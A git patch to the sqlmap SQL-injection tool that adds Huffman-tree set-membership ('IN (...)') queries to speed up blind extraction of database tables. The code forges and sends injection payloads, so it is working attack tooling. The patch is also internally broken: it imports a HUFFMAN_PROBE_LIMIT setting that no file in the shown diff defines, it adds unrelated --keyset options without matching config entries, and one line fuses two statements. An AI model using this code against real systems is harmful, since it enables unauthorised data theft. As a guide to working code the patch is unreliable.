From 889ad435412487c25bb632bff5cfb2428e32ea29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Sat, 20 Jun 2026 00:00:22 +0200 Subject: [PATCH] Adding adaptive set-membership (Huffman) retrieval for faster blind dumps --- data/txt/sha256sums.txt | 2 +- lib/core/option.py | 5 ++ lib/core/optiondict.py | 1 + lib/core/settings.py | 2 +- lib/parse/cmdline.py | 13 ++++ lib/techniques/blind/inference.py | 110 ++++++++++++++++++++++++++++++ 6 files changed, 131 insertions(+), 2 deletions(-) diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index b7f562c0d..14288ba5a 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -189,7 +189,7 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch 48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -e90183a7b5af8d5dd411cb74e3c24a9320b3194051a19abe0791fffae2b34fea lib/core/settings.py +fcb89f3b6474c6201fe2a77417c5c422e4f81a5f44567a51fb05eb6f6df22e93 lib/core/settings.py cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py 70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py diff --git a/lib/core/option.py b/lib/core/option.py index 5cb69d297..53163bc8e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2145,6 +2145,11 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.heuristicTest = None kb.hintValue = "" kb.htmlFp = [] + kb.huffmanModel = {} + kb.huffmanValidated = False + kb.disableHuffman = False + kb.huffmanProbes = 0 + kb.huffmanEscapes = 0 kb.httpErrorCodes = {} kb.inferenceMode = False kb.ignoreCasted = None diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 
af5c5ab6b..9270511c0 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -270,6 +270,7 @@ optDict = { "Hidden": { "dummy": "boolean", "disablePrecon": "boolean", + "noHuffman": "boolean", "profile": "boolean", "forceDns": "boolean", "murphyRate": "integer", diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ab135719..da96022a6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.128" +VERSION = "1.10.6.129" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 1ef639ed6..e369f19c9 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -848,6 +848,9 @@ def cmdLineParser(argv=None): parser.add_argument("--disable-precon", dest="disablePrecon", action="store_true", help=SUPPRESS) + parser.add_argument("--no-huffman", dest="noHuffman", action="store_true", + help=SUPPRESS) # "Disable adaptive (Huffman) set-membership retrieval used by default to speed up blind table dumps" + parser.add_argument("--profile", dest="profile", action="store_true", help=SUPPRESS) @@ -866,6 +869,16 @@ def cmdLineParser(argv=None): parser.add_argument("--force-pivoting", dest="forcePivoting", action="store_true", help=SUPPRESS) + # Experimental: dump table rows via keyset (seek) pagination on a detected indexed + # primary key instead of ORDER BY ... LIMIT/OFFSET (much cheaper on huge tables). + # --keyset forces it for any table size; --no-keyset disables it (incl. the automatic + # use on large tables), falling back to the plain LIMIT/OFFSET dump. 
+ parser.add_argument("--keyset", dest="keyset", action="store_true", + help=SUPPRESS) + + parser.add_argument("--no-keyset", dest="noKeyset", action="store_true", + help=SUPPRESS) + parser.add_argument("--ignore-stdin", dest="ignoreStdin", action="store_true", help=SUPPRESS) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 41c490b7f..b1ec44a8d 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from __future__ import division +import heapq import re import time @@ -41,6 +42,7 @@ from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHAR_INFERENCE_MARK +from lib.core.settings import HUFFMAN_PROBE_LIMIT from lib.core.settings import INFERENCE_BLANK_BREAK from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import INFERENCE_GREATER_CHAR @@ -64,6 +66,10 @@ from lib.utils.safe2bin import safecharencode from lib.utils.xrange import xrange from thirdparty import six +# Sentinel returned by the default-on Huffman retrieval (disabled with --no-huffman) meaning "this character is +# outside the ASCII model (e.g. multi-byte/Unicode) - defer to the classic bisection". +_HUFFMAN_FALLBACK = object() + def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Bisection algorithm that can be used to perform blind SQL injection @@ -270,6 +276,95 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None return result + def huffmanChar(idx): + """ + Adaptive retrieval of a single character using set-membership ("... IN (...)") + questions driven by a Huffman tree built from an online frequency model of the data + retrieved so far (used by default for blind table dumps; '--no-huffman' disables it). 
+ The expected number of requests approaches the + data's entropy (fewer on text/hex), while uniform/binary data yields a balanced tree + (i.e. no penalty versus the classic bisection). + + Correctness does NOT depend on the (shared, racily updated) model: the tree is a + decision tree over the whole 0..127 range plus a dedicated ESCAPE leaf. At every node + the child that does NOT contain ESCAPE is the one tested, so any value outside 0..127 + (e.g. multi-byte/Unicode) fails every membership test, lands on ESCAPE and is handed + back to the classic bisection. Returns the character, None (end-of-string) or _HUFFMAN_FALLBACK. + """ + ESCAPE = -1 + model = kb.huffmanModel + + heap = [] + for order, ordinal in enumerate(xrange(128)): + heapq.heappush(heap, (model.get(ordinal, 0) + 1, order, (ordinal,))) + heapq.heappush(heap, (max(model.get(ESCAPE, 0), 1), 128, (ESCAPE,))) + + counter = 129 + while len(heap) > 1: + w1, _, n1 = heapq.heappop(heap) + w2, _, n2 = heapq.heappop(heap) + heapq.heappush(heap, (w1 + w2, counter, (n1, n2))) + counter += 1 + node = heap[0][2] + + def _concrete(n): + if len(n) == 1: + return [] if n[0] == ESCAPE else [n[0]] + return _concrete(n[0]) + _concrete(n[1]) + + def _hasEscape(n): + return n[0] == ESCAPE if len(n) == 1 else (_hasEscape(n[0]) or _hasEscape(n[1])) + + template = payload.replace("%s%s" % (INFERENCE_GREATER_CHAR, "%d"), " IN (%s)", 1) + + while len(node) == 2: + left, right = node + + if _hasEscape(left): + testNode, otherNode = right, left + elif _hasEscape(right): + testNode, otherNode = left, right + else: + leftLeaves, rightLeaves = _concrete(left), _concrete(right) + testNode, otherNode = (left, right) if len(leftLeaves) <= len(rightLeaves) else (right, left) + + testSet = _concrete(testNode) + setExpr = ','.join(str(_) for _ in testSet) + forgedPayload = safeStringFormat(template, (expressionUnescaped, idx, setExpr)) + result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) 
incrementCounter(getTechnique()) + + node = testNode if result else otherNode + + value = node[0] + + if value == ESCAPE: + model[ESCAPE] = model.get(ESCAPE, 0) + 1 + return _HUFFMAN_FALLBACK + + if value == 0: + # ORD(MID(..)) of an empty (past end-of-string) character is 0; mirror the classic + # bisection and signal end-of-string (do NOT pollute the model with the sentinel). + return None + + # One-time safety validation: cross-check the first set-membership result with a short + # equality probe. Unlike the long IN() lists, a single '=N' comparison cannot be + # truncated/mangled by a parameter-length limit or a WAF, so it is a trustworthy oracle. + # If it disagrees, the IN() channel is unreliable here: latch the technique off so the + # classic '>' bisection takes over for the rest of the run (graceful fallback). + if not kb.huffmanValidated: + verifyPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, value)) + verified = Request.queryPage(verifyPayload, timeBasedCompare=timeBasedCompare, raise404=False) + incrementCounter(getTechnique()) + if verified: + kb.huffmanValidated = True + else: + kb.disableHuffman = True + return _HUFFMAN_FALLBACK + + model[value] = model.get(value, 0) + 1 + return decodeIntToUnicode(value) + def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's @@ -283,6 +378,21 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if result: return result + if (not conf.noHuffman and not kb.disableHuffman and dump and continuousOrder and charsetType is None and not timeBasedCompare + and ("%s%s" % (INFERENCE_GREATER_CHAR, "%d")) in payload + and ("'%s'" % CHAR_INFERENCE_MARK) not in payload): + kb.huffmanProbes = (kb.huffmanProbes or 0) + 1 + result = huffmanChar(idx) + if result is not _HUFFMAN_FALLBACK: + return result + # 
huffman declined this character (Unicode/escape, or failed the validation probe). + # If the set-membership channel keeps escaping it is not paying off here (trimmed/ + # blocked long payloads, or non-ASCII-heavy data) -> latch off so the classic '>' + # bisection takes over efficiently for the rest of the run. + kb.huffmanEscapes = (kb.huffmanEscapes or 0) + 1 + if kb.huffmanProbes >= HUFFMAN_PROBE_LIMIT and kb.huffmanEscapes * 2 >= kb.huffmanProbes: + kb.disableHuffman = True + if charTbl is None: charTbl = type(asciiTbl)(asciiTbl)